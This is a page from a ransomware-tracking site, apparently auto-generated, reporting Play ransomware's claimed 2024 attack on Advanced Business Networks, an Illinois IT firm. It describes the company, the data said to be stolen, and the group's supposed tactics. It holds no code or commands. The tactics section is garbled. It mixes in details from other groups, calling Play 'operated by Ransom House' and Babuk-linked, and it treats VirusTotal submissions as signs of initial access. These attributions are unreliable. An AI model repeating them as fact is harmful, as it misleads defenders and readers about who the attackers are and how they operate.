The Tactics of Play Ransomware Group: A Threat to IT Security

Incident Date:

April 30, 2024

World map

Overview

Title

The Tactics of Play Ransomware Group: A Threat to IT Security

Victim

Advanced Business Networks, Inc

Attacker

Play

Location

Mundelein, USA

Illinois, USA

First Reported

April 30, 2024

Ransomware Attack on Advanced Business Networks by Play Group

Company Profile

Advanced Business Networks (ABN), based in Illinois, USA, is a prominent IT consulting firm specializing in providing comprehensive IT services to small and mid-sized organizations across the Chicago area. With a team of 10 consultants, engineers, and technicians, ABN boasts over 100 combined years of IT experience. The company is known for its strategic partnerships with major IT corporations such as Microsoft, Intel, and Hewlett Packard, which provide them with early access to new products and advanced technical support.

ABN's services range from concept development through implementation to ongoing management and support, with a strong emphasis on security and managed services designed to protect and manage IT infrastructures.

Details of the Ransomware Attack

The ransomware group known as Play, which is linked to the Babuk code and primarily targets Linux systems, has claimed responsibility for the attack on ABN. The attack resulted in the compromise of various sensitive data types including client documents, payroll records, accounting data, and personal employee information.

Operational Tactics of Play Ransomware Group

Play ransomware, operated by Ransom House, has evolved from merely stealing data to using cryptographic lockers specifically designed for Linux systems. The group is known for its sophisticated approach to encrypting victim data and demanding ransom. They typically leave a ransom note titled "How To Restore Your Files.txt" with detailed instructions for victims on how to proceed.

The group's method of operation includes the use of advanced tools such as AnyDesk, NetCat, and encoded PowerShell Empire scripts, which are often submitted to VirusTotal, indicating their initial access and persistence mechanisms.

Potential Vulnerabilities and Entry Points

Given ABN's extensive use of various IT platforms and their significant online presence, it is plausible that Play may have exploited vulnerabilities in these systems or used phishing tactics to gain initial access. The specific vector used in this attack, however, has not been disclosed.

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.